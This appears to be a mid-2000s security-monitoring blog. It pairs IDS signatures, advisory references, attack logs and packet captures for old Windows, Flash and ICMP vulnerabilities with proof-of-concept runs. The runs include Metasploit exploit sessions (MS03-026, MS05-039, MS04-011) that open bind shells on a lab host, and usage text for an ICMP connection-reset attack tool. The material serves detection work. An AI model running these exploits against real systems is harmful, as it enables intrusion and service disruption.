Mutterings

I hope this blog serves as one way for you, the reader, to check whether your computer is being used for crime. E-mail: amaterasu@job.email.ne.jp



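■Comment

Today, in most cases this is used not as a standalone attack but as a component built into bot worms.

I verified this with the proof-of-concept code. As a result, I confirmed that a remote connection can be made.

■Signature description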
RPC DCOM interface buffer overflow
http://www.iss.net/security_center/static/12629.php




■Proof-of-concept code

・Code: widely available to the public.

msf msrpc_dcom_ms03_026(win32_bind) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ------- ------------------
required RHOST The target address
required RPORT 135 The target port

Payload: Name Default Description
-------- -------- ------- -----------------------------------------

required EXITFUNC thread Exit technique: "process", "thread", "seh
required LPORT 4444 Listening port for bind shell

Target: Windows NT SP3-6a/2K/XP/2K3 English ALL

msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Splitting RPC request into 7 packets
[*] Got connection from 192.168.221.11:1878 <-> 192.168.221.180:4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.37.180
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.37.1

C:\WINNT\system32>



■Detection by Proventia (IDS)

MSRPC_RemoteActivate_Bo



■References

BugTraq Mailing List, Wed Jul 16 2003 - 23:27:27 CDT
[LSD] Critical security vulnerability in Microsoft Operating Systems
http://archives.neohapsis.com/archives/bugtraq/2003-07/0194.html

Internet Security Systems Security Alert #147
Flaw in Microsoft Windows RPC Implementation
http://xforce.iss.net/xforce/alerts/id/147

CERT Vulnerability Note VU#568148
Microsoft Windows RPC vulnerable to buffer overflow
http://www.kb.cert.org/vuls/id/568148

CERT Advisory CA-2003-16
Buffer Overflow in Microsoft RPC
http://www.cert.org/advisories/CA-2003-16.html

Microsoft Security Bulletin MS03-026
Buffer Overrun In RPC Interface Could Allow Code Execution (823980)
http://www.microsoft.com/technet/security/bulletin/ms03-026.mspx

VulnWatch Mailing List, Thu Jul 17 2003 - 16:04:40 CDT
Re: [LSD] Critical security vulnerability in Microsoft Operating Systems
http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0036.html

BugTraq Mailing List, Sun Jul 20 2003 - 14:01:13 CDT
Microsoft Windows 2000 RPC DCOM Interface DOS AND Privilege Escalation Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2003-07/0255.html

CIAC Information Bulletin N-117
Microsoft RPC Interface Buffer Overrun Vulnerability
http://www.ciac.org/ciac/bulletins/n-117.shtml

Core Security Technologies Advisory CORE-2003-12-05
DCE RPC Vulnerabilities New Attack Vectors Analysis
http://archives.neohapsis.com/archives/bugtraq/2003-12/0166.html

Hewlett-Packard Company Security Bulletin HPSBTU01051
SSRT4741 rev 0 DCE for HP Tru64 UNIX Potential RPC Buffer Overrun Attack
http://lists.virus.org/bugtraq-0406/msg00422.html

Hewlett-Packard Company Security Bulletin HPSBOV01056
SSRT4741 Rev.0 DCE for HP OpenVMS Potential RPC Buffer Overrun Attack
http://www.securitylab.ru/46406.html

Microsoft Security Bulletin MS05-012
Vulnerability in OLE and COM Could Allow Remote Code Execution (873333)
http://www.microsoft.com/technet/security/bulletin/MS05-012.mspx

Microsoft Security Bulletin MS04-012
Cumulative Update for Microsoft RPC/DCOM (828741)
http://www.microsoft.com/technet/security/bulletin/MS04-012.mspx

Microsoft Security Bulletin MS03-039
Buffer Overrun In RPCSS Service Could Allow Code Execution (824146)
http://www.microsoft.com/technet/security/bulletin/ms03-039.mspx

Microsoft Security Bulletin MS05-051
Vulnerabilities in MSDTC and COM+ Could Allow Remote Code Execution (902400)
http://www.microsoft.com/technet/security/Bulletin/MS05-051.mspx

CVE
CVE-2003-0352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0352






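■Comment

This attack targets ordinary users on ADSL, fiber and similar connections.

Also, most of the attacks come from bot worms.

I tested the proof-of-concept code. The attack succeeded, and I confirmed that a remote connection can be made.


■Signature description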

http://xforce.iss.net/xforce/xfdb/19705


■Scan tool

http://www.foundstone.com/resources/freetooldownload.htm?file=MS05039Scan.zip


■Proof-of-concept code

・Code: widely available to the public.

msf ms05_039_pnp(win32_bind) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------- --------------- ------------------------------------
---
required RHOST 192.168.221.180 The target address
required SMBPIPE browser Pipe name: browser, srvsvc, wkssvc
optional SMBDOM The domain for specified SMB usernam
e
required RPORT 139 The target port
optional SMBUSER The SMB username to connect with
optional SMBPASS The password for specified SMB usern
ame

Payload: Name Default Description
-------- -------- ------- ------------------------------------------

required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell

Target: Windows 2000 SP0-SP4

msf ms05_039_pnp(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows 2000 target ()
[*] Sending 1 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 192.168.221.11:1689 <-> 192.168.221.180:4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.37.180
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.37.1

C:\WINNT\system32>


■Detection by Proventia (IDS)

PlugAndPlay_BO


■Reference information

http://www.isskk.co.jp/support/techinfo/general/win_plugandplay_202.html



■Detection status

2005-12-17 18:04:38 JST PlugAndPlay_BO ***.45.186.15 ***762 192.168.221.180 445
2005-12-17 18:23:12 JST PlugAndPlay_BO ***.45.186.15 ***695 192.168.221.180 445
2005-12-17 18:57:04 JST PlugAndPlay_BO ***.45.186.15 ***242 192.168.221.180 445
2005-12-17 22:09:13 JST PlugAndPlay_BO ***.111.150.190 2396 192.168.221.180 445
2005-12-18 01:38:08 JST PlugAndPlay_BO ***.229.109.44 4338 192.168.221.180 445
2005-12-18 04:06:31 JST PlugAndPlay_BO ***.45.186.15 62236 192.168.221.180 445
2005-12-18 05:17:31 JST PlugAndPlay_BO ***.45.186.15 63902 192.168.221.180 445
2005-12-18 07:19:51 JST PlugAndPlay_BO ***.45.186.15 62***8 192.168.221.180 445
2005-12-18 20:14:38 JST PlugAndPlay_BO ***.168.245.101 2128 192.168.221.180 445
2005-12-18 22:21:46 JST PlugAndPlay_BO ***.45.79.119 3652 192.168.221.180 445
2005-12-18 22:32:33 JST PlugAndPlay_BO ***.45.8.186 4821 192.168.221.180 445
2005-12-19 08:30:00 JST PlugAndPlay_BO ***.89.54.63 1***98 192.168.221.180 445
2005-12-19 10:04:09 JST PlugAndPlay_BO ***.118.53.35 63730 192.168.221.180 445
2005-12-19 11:02:54 JST PlugAndPlay_BO ***.191.105.91 1202 192.168.221.180 139
2005-12-19 12:44:09 JST PlugAndPlay_BO ***.183.93.241 4995 192.168.221.180 139
2005-12-19 14:52:54 JST PlugAndPlay_BO ***.125.201.6 3179 192.168.221.180 445
2005-12-19 14:57:52 JST PlugAndPlay_BO ***.95.178.1 1404 192.168.221.180 445
2005-12-19 15:33:19 JST PlugAndPlay_BO ***.125.201.6 3068 192.168.221.180 445
2005-12-19 16:48:12 JST PlugAndPlay_BO ***.***.12.70 2700 192.168.221.180 445
2005-12-19 17:16:09 JST PlugAndPlay_BO ***.125.194.95 2063 192.168.221.180 445
2005-12-19 20:17:05 JST PlugAndPlay_BO ***.32.173.37 3576 192.168.221.180 445
2005-12-19 21:45:44 JST PlugAndPlay_BO ***.11.57.209 3033 192.168.221.180 139
2005-12-20 15:45:57 JST PlugAndPlay_BO ***.136.194.185 4890 192.168.221.180 139
2005-12-20 15:54:33 JST PlugAndPlay_BO ***.202.29.58 4165 192.168.221.180 445
2005-12-20 16:51:56 JST PlugAndPlay_BO ***.139.99.9 3198 192.168.221.180 445
2005-12-20 18:03:10 JST PlugAndPlay_BO ***.68.231.97 4185 192.168.221.180 445
2005-12-20 20:31:51 JST PlugAndPlay_BO ***.189.132.214 3974 192.168.221.180 139
2005-12-20 21:18:16 JST PlugAndPlay_BO ***.124.***.35 1678 192.168.221.180 445
2005-12-20 23:13:50 JST PlugAndPlay_BO ***.220.240.85 63216 192.168.221.180 445
2005-12-20 23:34:25 JST PlugAndPlay_BO ***.125.18.232 1175 192.168.221.180 445
2005-12-21 09:06:36 JST PlugAndPlay_BO ***.125.197.202 4698 192.168.221.180 445
2005-12-21 11:***:22 JST PlugAndPlay_BO ***.190.121.114 1721 192.168.221.180 445
2005-12-21 12:15:34 JST PlugAndPlay_BO ***.125.197.202 4081 192.168.221.180 445
2005-12-21 12:36:48 JST PlugAndPlay_BO ***.188.221.99 2925 192.168.221.180 445
2005-12-21 14:10:01 JST PlugAndPlay_BO ***.125.204.250 22*** 192.168.221.180 445
2005-12-21 14:52:50 JST PlugAndPlay_BO ***.125.197.202 3701 192.168.221.180 445
2005-12-21 14:58:06 JST PlugAndPlay_BO ***.125.204.250 4013 192.168.221.180 445
2005-12-21 15:27:34 JST PlugAndPlay_BO ***.125.204.250 3084 192.168.221.180 445
2005-12-21 15:31:43 JST PlugAndPlay_BO ***.222.7.34 2424 192.168.221.180 445
2005-12-21 16:11:28 JST PlugAndPlay_BO ***.125.197.202 2492 192.168.221.180 445
2005-12-21 16:44:37 JST PlugAndPlay_BO ***.97.33.80 2934 192.168.221.180 139
2005-12-21 16:***:40 JST PlugAndPlay_BO ***..68.225.3 4451 192.168.221.180 445
2005-12-21 18:22:07 JST PlugAndPlay_BO ***.125.213.*** 2696 192.168.221.180 445
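
One way to tally a detection log in this format by destination port, day and repeat source, added here as an example and not part of the original post. The sample lines are copied from the log above (the `***` masking is the blog author's); the function names and the eight-field layout are assumptions read off those lines.

```python
from collections import Counter

# Lines copied from the detection log above; "***" masking is the blog author's.
SAMPLE_LOG = """\
2005-12-17 18:04:38 JST PlugAndPlay_BO ***.45.186.15 ***762 192.168.221.180 445
2005-12-17 18:23:12 JST PlugAndPlay_BO ***.45.186.15 ***695 192.168.221.180 445
2005-12-17 22:09:13 JST PlugAndPlay_BO ***.111.150.190 2396 192.168.221.180 445
2005-12-18 04:06:31 JST PlugAndPlay_BO ***.45.186.15 62236 192.168.221.180 445
2005-12-19 11:02:54 JST PlugAndPlay_BO ***.191.105.91 1202 192.168.221.180 139
2005-12-19 12:44:09 JST PlugAndPlay_BO ***.183.93.241 4995 192.168.221.180 139
2005-12-19 14:52:54 JST PlugAndPlay_BO ***.125.201.6 3179 192.168.221.180 445
2005-12-19 15:33:19 JST PlugAndPlay_BO ***.125.201.6 3068 192.168.221.180 445
2005-12-21 11:***:22 JST PlugAndPlay_BO ***.190.121.114 1721 192.168.221.180 445
2005-12-21 16:***:40 JST PlugAndPlay_BO ***..68.225.3 4451 192.168.221.180 445
"""


def parse_event(line):
    """Split one log line into fields; return None if it does not have 8 columns."""
    parts = line.split()
    if len(parts) != 8 or not parts[7].isdigit():
        return None
    date, clock, tz, signature, src, sport, dst, dport = parts
    return {
        "date": date,
        "time": clock,              # may contain "***" where the author masked it
        "tz": tz,
        "signature": signature,
        "src": src,                 # first octet is masked, so this is only an approximate key
        "src_port": int(sport) if sport.isdigit() else None,  # None when masked
        "dst": dst,
        "dst_port": int(dport),
    }


def summarize(text):
    """Count events per destination port and per day, and list sources seen more than once."""
    events = [e for e in (parse_event(l) for l in text.splitlines()) if e]
    seen = {}
    for e in events:
        first, last, count = seen.get(e["src"], (e["date"], e["date"], 0))
        # ISO dates sort correctly as strings.
        seen[e["src"]] = (min(first, e["date"]), max(last, e["date"]), count + 1)
    return {
        "events": len(events),
        "by_dst_port": dict(Counter(e["dst_port"] for e in events)),
        "by_day": dict(Counter(e["date"] for e in events)),
        "repeat_sources": {
            src: {"count": n, "first_day": first, "last_day": last}
            for src, (first, last, n) in seen.items() if n > 1
        },
        "masked_src_ports": sum(1 for e in events if e["src_port"] is None),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG).items():
        print(key, value)
```

Because the first octet of every source address is masked, two entries with the same visible octets are not guaranteed to be the same host.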







■Comment

An increase in attacks exploiting this vulnerability was detected on April 30, 2004.

http://www.cyberpolice.go.jp/important/2004/20040430_084140.html


■Signature description

http://www.iss.net/security_center/static/12380.php

http://www.isskk.co.jp/support/techinfo/general/MS_SSL_168.html


■Proof-of-concept code

・Code: widely available to the public.


msf windows_ssl_pct(win32_bind) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ --------------- ------------------------------------
-
required RHOST 192.168.221.180 The target address
required RPORT 443 The target port
optional PROTO raw The application protocol (raw or smt
)

Payload: Name Default Description
-------- -------- ------- ------------------------------------------

required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell

Target: Windows 2000 SP0

msf windows_ssl_pct(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit target Windows 2000 SP0
[*] Sending 376 bytes to remote host.
[*] Waiting for a response...
[*] Exiting Bind Handler.


■Detection by Proventia

SSL_PCT1_Overflow


■References

Microsoft Security Bulletin MS04-011
Security Update for Microsoft Windows (835732)
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

Internet Security Systems Security Advisory, April 13, 2004
Microsoft SSL Library Remote Compromise Vulnerability
http://xforce.iss.net/xforce/alerts/id/168

CIAC Information Bulletin O-114
Microsoft Security Update for Microsoft Windows
http://www.ciac.org/ciac/bulletins/o-114.shtml

CERT Vulnerability Note VU#586540
Microsoft Private Communication Technology (PCT) fails to properly validate message inputs
http://www.kb.cert.org/vuls/id/586540

SecuriTeam Mailing List, Windows focus 22 Apr 2004
Microsoft SSL Library Remote Compromise Vulnerability (MS04-011, Exploit)
http://www.securiteam.com/windowsntfocus/5CP0L0KCKO.html

Internet Security Systems Security Alert, April 13, 2004
Multiple Vulnerabilities in Microsoft Products
http://xforce.iss.net/xforce/alerts/id/169

CIAC Information Bulletin O-114
Microsoft Security Update for Microsoft Windows [REVISED 25 Jun 2004]
http://www.ciac.org/ciac/bulletins/o-114.shtml

CVE
CVE-2003-0719
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0719


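■Comment

TCP/IP implementations from multiple vendors have a vulnerability that may expose them to denial-of-service attacks.

This signature detects attacks that exploit this vulnerability.



■Signature description

Detects ICMP type 3 (Destination Unreachable), code 2 (Protocol Unreachable).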

http://www.iss.net/security_center/static/17170.php
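
A minimal sketch of the check described above, added here as an example and not taken from the Proventia signature or the original post: it flags an ICMP type 3, code 2 message whose quoted datagram is TCP and reports which connection the error claims to refer to. The function names are assumptions, and the sample packets are constructed with documentation-range addresses.

```python
import socket
import struct

ICMP_DEST_UNREACH = 3      # ICMP type 3: Destination Unreachable
CODE_PROTO_UNREACH = 2     # code 2: Protocol Unreachable
IPPROTO_ICMP, IPPROTO_TCP = 1, 6


def ipv4_header(buf):
    """Return (header_len, protocol, src, dst), or None if buf is not a usable IPv4 header."""
    if len(buf) < 20 or buf[0] >> 4 != 4:
        return None
    ihl = (buf[0] & 0x0F) * 4
    if ihl < 20 or len(buf) < ihl:
        return None
    return ihl, buf[9], socket.inet_ntoa(buf[12:16]), socket.inet_ntoa(buf[16:20])


def match_proto_unreach_tcp(packet):
    """Return details if packet is ICMP 3/2 quoting a TCP segment, else None."""
    outer = ipv4_header(packet)
    if outer is None or outer[1] != IPPROTO_ICMP:
        return None
    icmp = packet[outer[0]:]
    if len(icmp) < 8 or icmp[0] != ICMP_DEST_UNREACH or icmp[1] != CODE_PROTO_UNREACH:
        return None
    quoted = icmp[8:]                      # original IP header + first 8 bytes of its payload
    inner = ipv4_header(quoted)
    if inner is None or inner[1] != IPPROTO_TCP:
        return None
    tcp = quoted[inner[0]:]
    if len(tcp) < 8:                       # need source port, destination port, sequence number
        return None
    sport, dport, seq = struct.unpack("!HHI", tcp[:8])
    return {
        "icmp_sender": outer[2],
        "icmp_receiver": outer[3],
        "quoted_src": inner[2], "quoted_sport": sport,
        "quoted_dst": inner[3], "quoted_dport": dport,
        "quoted_seq": seq,
        # The quoted datagram should have been sent by the host receiving the error.
        "quoted_src_is_receiver": inner[2] == outer[3],
    }


def build_ipv4(proto, src, dst, payload):
    """Constructed test input: 20-byte IPv4 header (checksum left at 0) plus payload."""
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                         socket.inet_aton(src), socket.inet_aton(dst))
    return header + payload


def build_sample(icmp_type, icmp_code, quoted_proto):
    """Constructed ICMP error sent to 192.0.2.10 that quotes one of its outbound datagrams."""
    quoted = build_ipv4(quoted_proto, "192.0.2.10", "198.51.100.20",
                        struct.pack("!HHI", 49152, 80, 0x11223344))
    icmp = struct.pack("!BBHI", icmp_type, icmp_code, 0, 0) + quoted
    return build_ipv4(IPPROTO_ICMP, "203.0.113.5", "192.0.2.10", icmp)


if __name__ == "__main__":
    print(match_proto_unreach_tcp(build_sample(3, 2, IPPROTO_TCP)))   # match
    print(match_proto_unreach_tcp(build_sample(3, 3, IPPROTO_TCP)))   # port unreachable: None
```

A protocol-unreachable error that quotes a TCP segment contradicts the fact that the peer was already speaking TCP, so the reported 4-tuple tells the analyst which session to inspect.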



■Proof-of-concept code

[root@linux ICMP_Protocol_Unreachable_TCP]# ./HOD-icmp-attacks-poc

(MS05-019) (CISCO:20050412)
ICMP attacks against TCP (Proof-of-Concept)

Copyright (c) 2004-2005 .: houseofdabus :.


Usage:

./HOD-icmp-attacks-poc <-fi:SRC-IP> <-ti:VICTIM-IP> <-fi:SRC-PORT> [-tp:int] [-a:int] [-n:int]

-fi:IP From (sender) IP address
-ti:IP To (target) IP address
-fp:int Target open TCP port number
(for example - 21, 25, 80)
-tp:int Inicial value for bruteforce (sender) TCP port number
(default: 0 = range of ports 0-65535)
-n:int Number of packets

-a:int ICMP attacks:
1 - Blind connection-reset attack
(ICMP protocol unreachable)
2 - Path MTU discovery attack
(slow down the transmission rate)
3 - ICMP Source Quench attack
[root@linux ICMP_Protocol_Unreachable_TCP]# ./HOD-icmp-attacks-poc -ti:192.168.221.180 -tp:80

(MS05-019) (CISCO:20050412)
ICMP attacks against TCP (Proof-of-Concept)

Copyright (c) 2004-2005 .: houseofdabus :.


[*] From IP: <192.168.0.1>, port: 80
[*] To IP: <192.168.221.180>, port: 80
[*] Count: 1



■Detection by Proventia (IDS)


ICMP_Protocol_Unreachable_TCP


■Reference information

Internet-Draft of ICMP attacks
ICMP attacks against TCP draft-gont-tcpm-icmp-attacks-00.txt
http://www.ietf.org/internet-drafts/draft-gont-tcpm-icmp-attacks-00.txt

OpenBSD 3.4 errata Web site
027: RELIABILITY FIX: August 25, 2004
http://www.openbsd.org/errata34.html

LWN.net Web site
LWN: 2.6.9-rc3 long-format changelog
http://lwn.net/Articles/104532/

Cisco Web site
Cisco IP Phone 7970G Release Notes for Firmware Release 6.0(1) SR1 for Cisco CallManager Versions 3.3 and 4.0
http://www.cisco.com/univercd/cc/td/doc/product/voice/c_ipphon/english/ipp7970/relnote/797060s1.htm

Gont's Web site
ICMP attacks against TCP
http://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html

NISCC Vulnerability Advisory 532967
Vulnerability Issues in ICMP packets with TCP payloads
http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en

Cisco Security Advisory 2005 April 12 1200 UTC (GMT)
Crafted ICMP Messages Can Cause Denial of Service
http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml

Microsoft Security Bulletin MS05-019
Vulnerabilities in TCP/IP Could Allow Remote Code Execution and Denial of Service (893066)
http://www.microsoft.com/technet/security/Bulletin/MS05-019.mspx

Secunia Security Advisory: SA14904
Cisco Various Products ICMP Message Handling Denial of Service
http://secunia.com/advisories/14904/

CERT Vulnerability Note VU#222750
Network Appliance Information for VU#222750
http://www.kb.cert.org/vuls/id/JGEI-69DM7V

NetApp Web site
NetApp On the Web
http://now.netapp.com/

Secunia Security Advisory: Sa14950
Juniper Networks JUNOS ICMP Message Handling Denial of Service
http://secunia.com/advisories/14950/

Secunia Security Advisory: SA14937
Network Appliance Data ONTAP ICMP Message Handling Denial of Service
http://secunia.com/advisories/14937/

Internet-Draft of ICMP attacks
ICMP attacks against TCP draft-gont-tcpm-icmp-attacks-03.txt
http://www.ietf.org/internet-drafts/draft-gont-tcpm-icmp-attacks-03.txt

SecurityTracker Alert ID: 1013696
VxWorks ICMP Processing Errors Let Remote Users Deny Service
http://www.securitytracker.com/alerts/2005/Apr/1013696.html

SecurityTracker Alert ID: 1013698
WatchGuard Firebox ICMP Processing Errors Let Remote Users Deny Service
http://www.securitytracker.com/alerts/2005/Apr/1013698.html

CIAC INFORMATION BULLETIN P-177
Vulnerabilities in TCP-IP (893066)
http://www.ciac.org/ciac/bulletins/p-177.shtml

CIAC INFORMATION BULLETIN P-181
Cisco Products Vulnerable to DoS via Crafted ICMP Messages
http://www.ciac.org/ciac/bulletins/p-181.shtml

BugTraq Mailing List, Thu May 26 2005 - 12:08:50 CDT
[security bulletin] SSRT4884 rev.0 - HP-UX TCP/IP Remote Denial of Service (DoS)
http://archives.neohapsis.com/archives/bugtraq/2005-05/0301.html

Hewlett-Packard Company Web site
IT Resource Center - login / register
http://www1.itrc.hp.com/service/cki/secBullArchive.do?admint=-682735245+1116276188578+28353475

SecurityTracker Alert ID: 1014505
HP Tru64 TCP/IP ISN and ICMP Processing Flaws Let Remote Users Deny Service
http://www.securitytracker.com/alerts/2005/Jul/1014505.html

Secunia Security Advisory: SA16126
Blue Coat Products ICMP Message Handling Denial of Service
http://secunia.com/advisories/16126/

Blue Coat Security Advisory July 19, 2005
Security Advisory: ICMP Error Message Vulnerabilities
http://www.bluecoat.com/support/knowledge/advisory_icmp_error_message_vulnerabilities.html

SecurityTracker Alert ID: 1014534
Blue Coat ProxySG Error in Processing TCP Sequence Numbers in ICMP Messages Lets Remote Users Deny Service
http://www.securitytracker.com/alerts/2005/Jul/1014534.html

BlueCoat Download Web page
ProxySG Secure Proxy Appliance
http://download.bluecoat.com/release/SGOS3/index.html

SecurityTracker Alert ID: 1014533
Blue Coat Spyware Interceptor Error in Processing TCP Sequence Numbers in ICMP Messages Lets Remote Users Deny Service
http://www.securitytracker.com/alerts/2005/Jul/1014533.html

SecurityTracker Alert ID: 1014532
Blue Coat Director Error in Processing TCP Sequence Numbers in ICMP Messages Lets Remote Users Deny Service
http://www.securitytracker.com/alerts/2005/Jul/1014532.html

CVE
CVE-2004-0790
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0790


■Comment

Macromedia Flash version 7.0.19.0 has a vulnerability: loading a malicious SWF file that contains a specially crafted DoAction tag may cause a denial of service.



■Signature description

http://www.iss.net/security_center/static/23022.php

This signature was released in XPU24.27 on January 11, 2005.

http://www.isskk.co.jp/support/XPressUpdates/proventiaG/RSNS7X24_27RNj.html



■Proof-of-concept code

・Code: widely available to the public.

・Impact: when the code is executed, IE throws an error and crashes.


■Detection by Proventia (IDS)


Flash_ActionDefineFunction_Name_BO


■Reference information

SEC-CONSULT Security Advisory 20051107-1
Macromedia Flash Player ActionDefineFunction Memory Corruption
http://www.sec-consult.com/226.html

Macromedia Flash Player Download Center Web page
Macromedia Flash Player Download Center Windows
http://www.macromedia.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash

Macromedia Security Bulletin MPSB05-07
Flash Player 7 Improper Memory Access Vulnerability
http://www.macromedia.com/devnet/security/security_zone/mpsb05-07.html

CVE
CVE-2005-3591
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3591



■Signature description

http://xforce.iss.net/xforce/xfdb/20783



■Detection by Proventia (IDS)


MS05-054


■Reference information

Secunia Security Advisory: SA15546
Microsoft Internet Explorer "window()" Denial of Service Weakness
http://secunia.com/advisories/15546/

Microsoft Internet Explorer Web page
Internet Explorer Home
http://www.microsoft.com/windows/ie/default.mspx

FrSIRT Security Advisory FrSIRT/ADV-2005-2509
Microsoft Internet Explorer "window()" Code Execution Vulnerability
http://www.frsirt.com/english/advisories/2005/2509

Microsoft Security Advisory (911302)
Vulnerability in the way Internet Explorer Handles onLoad Events Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/911302.mspx

CERT Vulnerability Note VU#887861
Microsoft Internet Explorer vulnerable to code execution via scripting "window()" object
http://www.kb.cert.org/vuls/id/887861

Internet Security Systems Protection Alert, November 22, 2005
Internet Explorer Javascript Window() Remote Code Execution
http://xforce.iss.net/xforce/alerts/id/209

CVE
CVE-2005-1790
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1790



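■Comment

Detects a remote connection to a port that was opened by exploiting a vulnerability or by similar means.

If a connection to an unknown port such as port 7777 is detected, I recommend checking the traffic in question.



■Signature description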

http://xforce.iss.net/xforce/xfdb/12903



■Detection by Proventia (IDS)

Microsoft_Windows_Shell_Banner


■Packet

N/A




■Signature description

http://xforce.iss.net/xforce/xfdb/22467




■Detection by Proventia (IDS)

1211_06



■MS05-051 scan tool

http://www.foundstone.com/resources/freetooldownload.htm?file=MS05051Scan.zip



■Packet

No. Time Source Destination Protocol Info
203 2005-12-12 09:18:55.591631 211.91.125.137 192.168.37.180 TCP 6000 > 1025 [SYN] Seq=0 Ack=0 Win=16384 Len=0 MSS=1414

Frame 203 (58 bytes on wire, 58 bytes captured)
Ethernet II, Src: 00:d0:c9:96:61:5d, Dst: 00:0c:29:5f:e0:5b
Internet Protocol, Src Addr: 211.91.125.137 (211.91.125.137), Dst Addr: 192.168.37.180 (192.168.37.180)
Transmission Control Protocol, Src Port: 6000 (6000), Dst Port: 1025 (1025), Seq: 0, Ack: 0, Len: 0

No. Time Source Destination Protocol Info
204 2005-12-12 09:18:55.592299 192.168.37.180 211.91.125.137 TCP 1025 > 6000 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460

Frame 204 (60 bytes on wire, 60 bytes captured)
Ethernet II, Src: 00:0c:29:5f:e0:5b, Dst: 00:d0:c9:96:61:5d
Internet Protocol, Src Addr: 192.168.37.180 (192.168.37.180), Dst Addr: 211.91.125.137 (211.91.125.137)
Transmission Control Protocol, Src Port: 1025 (1025), Dst Port: 6000 (6000), Seq: 0, Ack: 1, Len: 0

No. Time Source Destination Protocol Info
205 2005-12-12 09:18:58.822890 192.168.37.180 211.91.125.137 TCP 1025 > 6000 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460

Frame 205 (60 bytes on wire, 60 bytes captured)
Ethernet II, Src: 00:0c:29:5f:e0:5b, Dst: 00:d0:c9:96:61:5d
Internet Protocol, Src Addr: 192.168.37.180 (192.168.37.180), Dst Addr: 211.91.125.137 (211.91.125.137)
Transmission Control Protocol, Src Port: 1025 (1025), Dst Port: 6000 (6000), Seq: 0, Ack: 1, Len: 0

No. Time Source Destination Protocol Info
211 2005-12-12 09:19:05.401692 192.168.37.180 211.91.125.137 TCP 1025 > 6000 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460

Frame 211 (60 bytes on wire, 60 bytes captured)
Ethernet II, Src: 00:0c:29:5f:e0:5b, Dst: 00:d0:c9:96:61:5d
Internet Protocol, Src Addr: 192.168.37.180 (192.168.37.180), Dst Addr: 211.91.125.137 (211.91.125.137)
Transmission Control Protocol, Src Port: 1025 (1025), Dst Port: 6000 (6000), Seq: 0, Ack: 1, Len: 0

No. Time Source Destination Protocol Info
212 2005-12-12 09:19:34.724297 211.91.125.137 192.168.37.180 TCP 6000 > 1025 [RST] Seq=1 Ack=1077123615 Win=0 Len=0

Frame 212 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: 00:d0:c9:96:61:5d, Dst: 00:0c:29:5f:e0:5b
Internet Protocol, Src Addr: 211.91.125.137 (211.91.125.137), Dst Addr: 192.168.37.180 (192.168.37.180)
Transmission Control Protocol, Src Port: 6000 (6000), Dst Port: 1025 (1025), Seq: 1, Ack: 1077123615, Len: 0

No. Time Source Destination Protocol Info
220 2005-12-12 09:20:37.130134 211.91.125.137 192.168.37.180 TCP 2193 > 1025 [SYN] Seq=0 Ack=0 Win=16384 Len=0 MSS=1414

Frame 220 (62 bytes on wire, 62 bytes captured)
Ethernet II, Src: 00:d0:c9:96:61:5d, Dst: 00:0c:29:5f:e0:5b
Internet Protocol, Src Addr: 211.91.125.137 (211.91.125.137), Dst Addr: 192.168.37.180 (192.168.37.180)
Transmission Control Protocol, Src Port: 2193 (2193), Dst Port: 1025 (1025), Seq: 0, Ack: 0, Len: 0

No. Time Source Destination Protocol Info
221 2005-12-12 09:20:37.130972 192.168.37.180 211.91.125.137 TCP 1025 > 2193 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460

Frame 221 (62 bytes on wire, 62 bytes captured)
Ethernet II, Src: 00:0c:29:5f:e0:5b, Dst: 00:d0:c9:96:61:5d
Internet Protocol, Src Addr: 192.168.37.180 (192.168.37.180), Dst Addr: 211.91.125.137 (211.91.125.137)
Transmission Control Protocol, Src Port: 1025 (1025), Dst Port: 2193 (2193), Seq: 0, Ack: 1, Len: 0

No. Time Source Destination Protocol Info
222 2005-12-12 09:20:37.380023 211.91.125.137 192.168.37.180 TCP 2193 > 1025 [ACK] Seq=1 Ack=1 Win=16968 Len=0

Frame 222 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: 00:d0:c9:96:61:5d, Dst: 00:0c:29:5f:e0:5b
